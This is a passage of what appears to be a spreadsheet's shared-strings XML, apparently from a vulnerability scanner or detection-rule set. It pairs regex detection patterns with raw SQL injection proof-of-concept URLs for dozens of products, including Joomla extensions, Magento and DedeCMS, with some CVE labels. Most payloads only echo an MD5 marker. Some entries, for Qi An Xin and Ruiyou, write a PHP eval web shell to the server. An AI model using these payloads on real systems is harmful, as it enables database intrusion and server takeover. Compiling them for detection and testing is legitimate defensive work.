    <t>/index.php?option=com_memorix&amp;task=result&amp;searchplugin=theme&amp;Itemid=60&amp;ThemeID=-8594+union+select+111,222,MD5(1),444,555,666,777,888,999--+AbuHassan</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_pccookbook\&amp;page=viewuserrecipes\&amp;user_id=\-9999999\+UNION\+SELECT\+md5\(3\.1415\)\-\-).*</t>
  </si>
  <si>
    <t>/index.php?option=com_pccookbook&amp;page=viewuserrecipes&amp;user_id=-9999999+UNION+SELECT+md5(3.1415)--</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_people\&amp;controller=people\&amp;task=details\&amp;id=\-1\ UNION\ SELECT\ md5\(3\.1415\),2,3).*</t>
  </si>
  <si>
    <t>/index.php?option=com_people&amp;controller=people&amp;task=details&amp;id=-1 UNION SELECT md5(3.1415),2,3</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?tmpl=component\&amp;option=com_redshop\&amp;view=product\&amp;task=addtocompare\&amp;pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,md5\(3\.1415\),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23\&amp;cmd=add\&amp;cid=20\&amp;sid=0\.6886686905513422).*</t>
  </si>
  <si>
    <t>/index.php?tmpl=component&amp;option=com_redshop&amp;view=product&amp;task=addtocompare&amp;pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,md5(3.1415),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&amp;cmd=add&amp;cid=20&amp;sid=0.6886686905513422</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_registrationpro\&amp;view=calendar\&amp;Itemid=1\&amp;listview=1\&amp;month=6\&amp;year=\-1%20AND%20%28SELECT%207804%20FROM%28SELECT%20COUNT%28\*%29%2CCONCAT%281%2C%28MID%28%28md5%283\.14%29%29%2C1%2C54%29%29%2C1%2CFLOOR%28RAND%280%29\*2%29%29x%20FROM%20INFORMATION_SCHEMA\.CHARACTER_SETS%20GROUP%20BY%20x%29a%29).*</t>
  </si>
  <si>
    <t>/index.php?option=com_registrationpro&amp;view=calendar&amp;Itemid=1&amp;listview=1&amp;month=6&amp;year=-1%20AND%20%28SELECT%207804%20FROM%28SELECT%20COUNT%28*%29%2CCONCAT%281%2C%28MID%28%28md5%283.14%29%29%2C1%2C54%29%29%2C1%2CFLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_s5clanroster\&amp;view=s5clanroster\&amp;layout=category\&amp;task=category\&amp;id=\-null%27\+/\*!50000UnIoN\*/\+/\*!50000SeLeCt\*/md5\(3\.1415\),222\-\-\+\-).*</t>
  </si>
  <si>
    <t>/index.php?option=com_s5clanroster&amp;view=s5clanroster&amp;layout=category&amp;task=category&amp;id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/md5(3.1415),222--+-</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_vnmshop\&amp;catid=113%20LIMIT%200,1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5\(3\.14\),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\#\&amp;Itemid=211).*</t>
  </si>
  <si>
    <t>/index.php?option=com_vnmshop&amp;catid=113%20LIMIT%200,1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5(3.14),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&amp;Itemid=211</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?tmpl=component\&amp;option=com_jephotogallery\&amp;view=category\&amp;task=fetchimage\&amp;categoryid=\-29%20UNion%20seLECT%20%28SELECT%20GROUP_CONCAT%280x7e%2Cmd5%281%29%2C0x7e%29%20FROM%20information_schema\.tables%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2CNuLL%2C0%2C0\-\-%20\-).*</t>
  </si>
  <si>
    <t>/index.php?tmpl=component&amp;option=com_jephotogallery&amp;view=category&amp;task=fetchimage&amp;categoryid=-29%20UNion%20seLECT%20%28SELECT%20GROUP_CONCAT%280x7e%2Cmd5%281%29%2C0x7e%29%20FROM%20information_schema.tables%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2CNuLL%2C0%2C0--%20-</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_jobgroklist\&amp;view=posting\&amp;id=2:mechanic\&amp;Itemid=\-7282%20OR%201%20GROUP%20BY%20CONCAT%280x7e7e7e%2Cmd5%28123%29%2C0x7e7e7e%2CFLOOR%28RAND%280%29%2a2%29%29%20HAVING%20MIN%280%29%23).*</t>
  </si>
  <si>
    <t>/index.php?option=com_jobgroklist&amp;view=posting&amp;id=2:mechanic&amp;Itemid=-7282%20OR%201%20GROUP%20BY%20CONCAT%280x7e7e7e%2Cmd5%28123%29%2C0x7e7e7e%2CFLOOR%28RAND%280%29%2a2%29%29%20HAVING%20MIN%280%29%23</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_prayercenter\&amp;task=confirm\&amp;id=1\&amp;sessionid=1%27%20AND%20EXTRACTVALUE%2822%2CCONCAT%280x5c%2Cmd5%281%29%29%29\-\-%20X%0A).*</t>
  </si>
  <si>
    <t>/index.php?option=com_prayercenter&amp;task=confirm&amp;id=1&amp;sessionid=1%27%20AND%20EXTRACTVALUE%2822%2CCONCAT%280x5c%2Cmd5%281%29%29%29--%20X%0A</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_vmap\&amp;task=loadmarker\&amp;latlngbound=\-40\.716362432588596,40\.71920853699145,\-73\.983044552948,\-73\.972959447052%2f%2a%2a%2funion%2f%2a%2a%2fselect%2f%2a%2a%2f%2a%20from%20%28%28select%201%29A%20join%20%28select%202%29B%20join%20%28select%203%29C%20join%20%28select%204%29D%20join%20%28select%205%29E%20join%20%28select%206%29F%20join%20%28select%207%29G%20join%20%28select%208%29H%20join%20%28select%209%29K%20join%20%28select%2010%29Q%20join%20%28select%20md5%281%29%29O%29\-\-\&amp;mapid=1).*</t>
  </si>
  <si>
    <t>/index.php?option=com_vmap&amp;task=loadmarker&amp;latlngbound=-40.716362432588596,40.71920853699145,-73.983044552948,-73.972959447052%2f%2a%2a%2funion%2f%2a%2a%2fselect%2f%2a%2a%2f%2a%20from%20%28%28select%201%29A%20join%20%28select%202%29B%20join%20%28select%203%29C%20join%20%28select%204%29D%20join%20%28select%205%29E%20join%20%28select%206%29F%20join%20%28select%207%29G%20join%20%28select%208%29H%20join%20%28select%209%29K%20join%20%28select%2010%29Q%20join%20%28select%20md5%281%29%29O%29--&amp;mapid=1</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_fastball\&amp;view=player\&amp;id=266\&amp;season=1%20AND%20\(SELECT%204132%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(\(SELECT%20MID\(\(IFNULL\(CAST\(md5\(233\)%20AS%20CHAR\),0x20\)\),1,54\)\),FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20INFORMATION_SCHEMA\.PLUGINS%20GROUP%20BY%20x\)a\)\&amp;Itemid=28).*</t>
  </si>
  <si>
    <t>/index.php?option=com_fastball&amp;view=player&amp;id=266&amp;season=1%20AND%20(SELECT%204132%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20MID((IFNULL(CAST(md5(233)%20AS%20CHAR),0x20)),1,54)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)&amp;Itemid=28</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_fss\&amp;view=test\&amp;prodid=777777\.7%27\+union\+all\+select\+77777777777777%2C77777777777777%2C77777777777777%2Cmd5\(3\.1415\)%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777\-\-\+D4NB4R%22).*</t>
  </si>
  <si>
    <t>/index.php?option=com_fss&amp;view=test&amp;prodid=777777.7%27+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cmd5(3.1415)%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R%22</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?category_id=1\)%20OR%20\(SELECT%208749%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(0x716b787071,\(SELECT%20\(ELT\(8749=8749,1\)\)\),0x716b6a7171,FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20INFORMATION_SCHEMA\.CHARACTER_SETS%20GROUP%20BY%20x\)a\)\-\-%20fOYr\&amp;Itemid=135\&amp;option=com_jak2filter\&amp;searchword=the\&amp;view=itemlist\&amp;xf_2=%27).*</t>
  </si>
  <si>
    <t>/index.php?category_id=1)%20OR%20(SELECT%208749%20FROM(SELECT%20COUNT(*),CONCAT(0x716b787071,(SELECT%20(ELT(8749=8749,1))),0x716b6a7171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)--%20fOYr&amp;Itemid=135&amp;option=com_jak2filter&amp;searchword=the&amp;view=itemlist&amp;xf_2=%27</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_oscommerce\&amp;osMod=mshop_pl_src\&amp;manufacturers_id=7\&amp;sort=products_sort_order\&amp;page=index\.php\&amp;format=xml\&amp;task=showproducts\&amp;view=med\&amp;sort=latest\&amp;sortdir=%27).*</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_sponsorwall\&amp;task=click\&amp;wallid=1%20AND%20\(SELECT%204132%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(\(SELECT%20MID\(\(IFNULL\(CAST\(md5\(233\)%20AS%20CHAR\),0x20\)\),1,54\)\),FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20INFORMATION_SCHEMA\.PLUGINS%20GROUP%20BY%20x\)a\)).*</t>
  </si>
  <si>
    <t>/index.php?option=com_sponsorwall&amp;task=click&amp;wallid=1%20AND%20(SELECT%204132%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20MID((IFNULL(CAST(md5(233)%20AS%20CHAR),0x20)),1,54)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_vikbooking\&amp;view=availability\&amp;room_ids\[0\]=1%20AND%20\(SELECT%204132%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(\(SELECT%20MID\(\(IFNULL\(CAST\(md5\(233\)%20AS%20CHAR\),0x20\)\),1,54\)\),FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20INFORMATION_SCHEMA\.PLUGINS%20GROUP%20BY%20x\)a\)).*</t>
  </si>
  <si>
    <t>/index.php?option=com_vikbooking&amp;view=availability&amp;room_ids[0]=1%20AND%20(SELECT%204132%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20MID((IFNULL(CAST(md5(233)%20AS%20CHAR),0x20)),1,54)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)</t>
  </si>
  <si>
    <t>.*?(?:/weblinks\-categories\?id=0%20%29%20union%20select%20md5\(3\.1415\)\-\-%20%29).*</t>
  </si>
  <si>
    <t>/weblinks-categories?id=0%20%29%20union%20select%20md5(3.1415)--%20%29</t>
  </si>
  <si>
    <t>web_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_coupon\&amp;view=coupons\&amp;catid=1%20AND%20\(SELECT%204244%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(md5\(233\),0x7176627071,\(SELECT%20\(ELT\(4244=4244,1\)\)\),0x7171787071,FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20INFORMATION_SCHEMA\.PLUGINS%20GROUP%20BY%20x\)a\)).*</t>
  </si>
  <si>
    <t>/index.php?option=com_coupon&amp;view=coupons&amp;catid=1%20AND%20(SELECT%204244%20FROM(SELECT%20COUNT(*),CONCAT(md5(233),0x7176627071,(SELECT%20(ELT(4244=4244,1))),0x7171787071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_recipe\&amp;view=recipes\&amp;task=print_ingred\&amp;id=\[10%27\+/\*!50000Procedure\*/\+/\*!50000Analyse\*/\+\(extractvalue\(0,/\*!50000concat\*/\(0x27,md5\(233\),@@version\)\),0\)\-\-%20\-\]).*</t>
  </si>
  <si>
    <t>/index.php?option=com_recipe&amp;view=recipes&amp;task=print_ingred&amp;id=[10%27+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,md5(233),@@version)),0)--%20-]</t>
  </si>
  <si>
    <t>Joomla_SQL注入_CVE-2015-7297</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_contenthistory\&amp;view=history\&amp;list\[ordering\]=\&amp;item_id=1\&amp;type_id=1\&amp;list\[select\]=updatexml\(0x23,concat\(1,md5\(8888\)\),1\)).*</t>
  </si>
  <si>
    <t>/index.php?option=com_contenthistory&amp;view=history&amp;list[ordering]=&amp;item_id=1&amp;type_id=1&amp;list[select]=updatexml(0x23,concat(1,md5(8888)),1)</t>
  </si>
  <si>
    <t>POC_最终正确版_删除误报path.xlsx</t>
  </si>
  <si>
    <t>Joomla_SQL注入_CVE-2017-8917</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_fields\&amp;view=fields\&amp;layout=modal\&amp;list\[fullordering\]=updatexml\(0x23,concat\(1,md5\(8888\)\),1\)).*</t>
  </si>
  <si>
    <t>/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)</t>
  </si>
  <si>
    <t>Joomla_SQL注入_CVE-2018-7314</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_prayercenter\&amp;task=confirm\&amp;id=1\&amp;sessionid=1'\ AND\ EXTRACTVALUE\(22,CONCAT\(0x7e,md5\(randomInt\(800000000,\ 1000000000\)\)\)\)\-\-\ X).*</t>
  </si>
  <si>
    <t>/index.php?option=com_prayercenter&amp;task=confirm&amp;id=1&amp;sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5(randomInt(800000000, 1000000000))))-- X</t>
  </si>
  <si>
    <t>AeroCMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/author_posts\.php\?author_post=1'|/cms\-blog/author_posts\.php\?author_post=1'|/cms/author_posts\.php\?author_post=1'|/blog/author_posts\.php\?author_post=1').*</t>
  </si>
  <si>
    <t>/author_posts.php?author_post=1'|/cms-blog/author_posts.php?author_post=1'|/cms/author_posts.php?author_post=1'|/blog/author_posts.php?author_post=1'</t>
  </si>
  <si>
    <t>AMSS</t>
  </si>
  <si>
    <t>AMSS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/modules/mail/main/maildetail\.php\?id=\-1%27%20union%20all%20select%201,2,md5\(4756\),md5\(4756\),md5\(4756\),6,7,8,md5\(4756\),md5\(4756\),md5\(4756\),12,13,14,15,16,17,18\-\-%20\-).*</t>
  </si>
  <si>
    <t>/modules/mail/main/maildetail.php?id=-1%27%20union%20all%20select%201,2,md5(4756),md5(4756),md5(4756),6,7,8,md5(4756),md5(4756),md5(4756),12,13,14,15,16,17,18--%20-</t>
  </si>
  <si>
    <t>microsoft_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>畅捷</t>
  </si>
  <si>
    <t>畅捷_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/tplus/UFAQD/keyEdit\.aspx\?KeyID=1%27%20and%201=\(SELECT\+sys\.fn_varbintohexstr\(hashbytes\('MD5'%2C'999999999'\)\)\)%20\-\-\&amp;preload=1).*</t>
  </si>
  <si>
    <t>/tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(SELECT+sys.fn_varbintohexstr(hashbytes('MD5'%2C'999999999')))%20--&amp;preload=1</t>
  </si>
  <si>
    <t>auth_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>大华_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml\(1,concat\(0x7e,\(select%20md5\(1\)\),0x7e\),1\)\-\-%22%7D/extend/%7B%7D).*</t>
  </si>
  <si>
    <t>/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D</t>
  </si>
  <si>
    <t>sql_injection_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>.*?(?:/portal/attachment_getAttList\.action\?bean\.TabName=1\&amp;bean\.RecId=1%27\)%20AND%20EXTRACTVALUE\(8841,CONCAT\(0x7e,0x716b6b6b71,\(SELECT%20\(ELT\(8841=8841,1\)\)\),0x7178786271\)\)%20AND%20\(%27mYhO%27=%27mYhO).*</t>
  </si>
  <si>
    <t>/portal/attachment_getAttList.action?bean.TabName=1&amp;bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,0x716b6b6b71,(SELECT%20(ELT(8841=8841,1))),0x7178786271))%20AND%20(%27mYhO%27=%27mYhO</t>
  </si>
  <si>
    <t>织梦_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/member/ajax_membergroup\.php\?action=post\&amp;membergroup=@`'`/\*!50000Union\+\*/\+/\*!50000select\+\*/\+md5\(\{\{num\}\}\)\+\-\-\+@`'`|/member/ajax_membergroup\.php\?action=post\&amp;membergroup=@`'`/\*!50000Union\+\*/\+/\*!50000select\+\*/\+md5\(999999\)\+\-\-\+@`'`).*</t>
  </si>
  <si>
    <t>/member/ajax_membergroup.php?action=post&amp;membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`|/member/ajax_membergroup.php?action=post&amp;membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`</t>
  </si>
  <si>
    <t>DotNetCMS</t>
  </si>
  <si>
    <t>DotNetCMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/user/City_ajax\.aspx\?CityId=33'union%20select%20sys\.fn_sqlvarbasetostr\(HashBytes\('MD5','\{\{randstr\}\}'\)\),2\-\-).*</t>
  </si>
  <si>
    <t>多米CMS_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/duomiphp/ajax\.php\?action=addfav\&amp;id=1\&amp;uid=1%20and%20extractvalue\(1,concat_ws\(1,1,md5\(9999999999\)\)\)|/duomiphp/ajax\.php\?action=addfav\&amp;id=1\&amp;uid=1%20and%20extractvalue\(1,concat_ws\(1,1,md5\(\{\{num\}\}\)\)\)).*</t>
  </si>
  <si>
    <t>/duomiphp/ajax.php?action=addfav&amp;id=1&amp;uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))|/duomiphp/ajax.php?action=addfav&amp;id=1&amp;uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))</t>
  </si>
  <si>
    <t>ECTouch_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/upload/mobile/index\.php\?c=category\&amp;a=asynclist\&amp;price_max=1\.0%20AND%20\(SELECT%201%20FROM\(SELECT%20COUNT\(\*\),CONCAT\(0x7e,md5\(1\),0x7e,FLOOR\(RAND\(0\)\*2\)\)x%20FROM%20INFORMATION_SCHEMA\.CHARACTER_SETS%20GROUP%20BY%20x\)a\)'').*</t>
  </si>
  <si>
    <t>/upload/mobile/index.php?c=category&amp;a=asynclist&amp;price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''</t>
  </si>
  <si>
    <t>泛微_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/pweb/careerapply/HrmCareerApplyPerView\.jsp\?id=1%20union%20select%201,2,sys\.fn_sqlvarbasetostr\(HashBytes\(%27MD5%27,%271%27\)\),db_name\(1\),5,6,7).*</t>
  </si>
  <si>
    <t>/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7</t>
  </si>
  <si>
    <t>帆软_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/webroot/decision/view/ReportServer\?\{\{string\}\}=\&amp;n=\$\{sum\(1024,123\)\}).*</t>
  </si>
  <si>
    <t>remote_code_execution_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>宏景_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/servlet/codesettree\?categories=\~31\~27\~20union\~20all\~20select\~20\~27hongjing\~27\~2c\~40\~40version\~2d\~2d\&amp;codesetid=1\&amp;flag=c\&amp;parentid=\-1\&amp;status=1).*</t>
  </si>
  <si>
    <t>/servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d&amp;codesetid=1&amp;flag=c&amp;parentid=-1&amp;status=1</t>
  </si>
  <si>
    <t>.*?(?:/w_selfservice/oauthservlet/%2e\./\.%2e/common/org/loadtree\?params=child\&amp;treetype=1\&amp;parentid=1%27%3BWAITFOR\+DELAY\+%270%3A0%3A5%27\-\-\&amp;kind=2\&amp;issuperuser=1\&amp;manageprive=1\&amp;action=1\&amp;target=1\&amp;backdate=1\&amp;jump=1).*</t>
  </si>
  <si>
    <t>/w_selfservice/oauthservlet/%2e./.%2e/common/org/loadtree?params=child&amp;treetype=1&amp;parentid=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&amp;kind=2&amp;issuperuser=1&amp;manageprive=1&amp;action=1&amp;target=1&amp;backdate=1&amp;jump=1</t>
  </si>
  <si>
    <t>javascript_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>JSOA</t>
  </si>
  <si>
    <t>JSOA_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/jsoa/wap2/personalMessage/user_list_3g\.jsp\?userIds=1\&amp;userNames=1\&amp;content=1\&amp;org_id=1%20union/\*\*/select/\*\*/1,md5\(\{\{payload\}\}\)%20%23).*</t>
  </si>
  <si>
    <t>/jsoa/wap2/personalMessage/user_list_3g.jsp?userIds=1&amp;userNames=1&amp;content=1&amp;org_id=1%20union/**/select/**/1,md5({{payload}})%20%23</t>
  </si>
  <si>
    <t>蓝凌_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/frm/frm_form_list_main\.aspx\?list_id=1%20and%201=@@version\-\-\+|/third/DingTalk/Pages/UniformEntry\.aspx\?moduleid=1%20and%201=@@version\-\-\+|/third/DingTalk/Demo/ShowUserInfo\.aspx\?account=1'%20and%201=@@version\-\-\+|/frm/frm_button_func\.aspx\?formid=1%20and%201=@@version\-\-\+|/dossier/doc_fileedit_word\.aspx\?recordid=1'%20and%201=@@version\-\-\+\&amp;edittype=1,1|/flow/fl_define_flow_chart_show\.aspx\?id=1%20and%201=@@version\-\-\+).*</t>
  </si>
  <si>
    <t>/frm/frm_form_list_main.aspx?list_id=1%20and%201=@@version--+|/third/DingTalk/Pages/UniformEntry.aspx?moduleid=1%20and%201=@@version--+|/third/DingTalk/Demo/ShowUserInfo.aspx?account=1'%20and%201=@@version--+|/frm/frm_button_func.aspx?formid=1%20and%201=@@version--+|/dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&amp;edittype=1,1|/flow/fl_define_flow_chart_show.aspx?id=1%20and%201=@@version--+</t>
  </si>
  <si>
    <t>Magento_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/catalog/product_frontend_action/synchronize\?type_id=recently_products\&amp;ids\[0\]\[added_at\]=\&amp;ids\[0\]\[product_id\]\[from\]=\?\&amp;ids\[0\]\[product_id\]\[to\]=\)\)\)%20OR%20\(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0\)%20\-\-%20\-).*</t>
  </si>
  <si>
    <t>/catalog/product_frontend_action/synchronize?type_id=recently_products&amp;ids[0][added_at]=&amp;ids[0][product_id][from]=?&amp;ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20-</t>
  </si>
  <si>
    <t>magento_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>商城</t>
  </si>
  <si>
    <t>Mallbuilder商城_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/\?orderby=1\&amp;s=list\&amp;m=product\&amp;brand=%27%20AND%20%28SELECT%206071%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%280x7e7e7e%2Cmd5%28123%29%2C0x7e7e7e%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA\.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20and%27).*</t>
  </si>
  <si>
    <t>/?orderby=1&amp;s=list&amp;m=product&amp;brand=%27%20AND%20%28SELECT%206071%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%280x7e7e7e%2Cmd5%28123%29%2C0x7e7e7e%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20and%27</t>
  </si>
  <si>
    <t>PHPOK_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/api\.php\?c=project\&amp;f=index\&amp;token=1234\&amp;id=news\&amp;sort=1\ and\ extractvalue\(1,concat\(0x7e,\{\{verify\}\}\)\)\ \-\-\+).*</t>
  </si>
  <si>
    <t>/api.php?c=project&amp;f=index&amp;token=1234&amp;id=news&amp;sort=1 and extractvalue(1,concat(0x7e,{{verify}})) --+</t>
  </si>
  <si>
    <t>PHPSHE_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/include/plugin/payment/alipay/pay\.php\?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28\{\{randstr\}\}%29,4,5,6,7,8,9,10,11,12%23_).*</t>
  </si>
  <si>
    <t>/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28{{randstr}}%29,4,5,6,7,8,9,10,11,12%23_</t>
  </si>
  <si>
    <t>php_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>奇安信</t>
  </si>
  <si>
    <t>奇安信_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/api/dp/rptsvcsyncpoint\?ccid=1%27%3Bcreate\+table\+O%28T\+TEXT%29%3Binsert\+into\+O%28T%29\+values%28%27%3C%3Fphp\+%40eval%28%24_POST%5B1%5D%29%3B%3F%3E%27%29%3Bcopy\+O%28T%29\+to\+%27C%3A%5CProgram\+Files\+%28x86%29%5C360%5Cskylar6%5Cwww%5C1\.php%27%3Bdrop\+table\+O%3B\-\-\+\+).*</t>
  </si>
  <si>
    <t>/api/dp/rptsvcsyncpoint?ccid=1%27%3Bcreate+table+O%28T+TEXT%29%3Binsert+into+O%28T%29+values%28%27%3C%3Fphp+%40eval%28%24_POST%5B1%5D%29%3B%3F%3E%27%29%3Bcopy+O%28T%29+to+%27C%3A%5CProgram+Files+%28x86%29%5C360%5Cskylar6%5Cwww%5C1.php%27%3Bdrop+table+O%3B--++</t>
  </si>
  <si>
    <t>.*?(?:/api/client/getsimilarlist\?status\[0,1%29\+union\+all\+select\+%28%2F%2A%2150000select%2A%2F\+79787337%29%2C\+setting%2C\+setting%2C\+status%2C\+name%2C\+create_time\+from\+%22user%22\+where\+1\+in\+%281\]=1\&amp;status\[0\]=1).*</t>
  </si>
  <si>
    <t>/api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&amp;status[0]=1</t>
  </si>
  <si>
    <t>瑞友</t>
  </si>
  <si>
    <t>瑞友_SQL注入</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=/Index/dologin/name/demo%27\)%3bselect%20unhex%28%273c3f70687020406576616c28245f504f53545b315d293b3f3e%27%29%20into%20outfile%20%27%2e%5C%5C%2e%2e%5C%5C%2e%2e%5C%5CWebRoot%5C%5C\{\{file_name\}\}%27%23/pwd/123123).*</t>
  </si>
  <si>
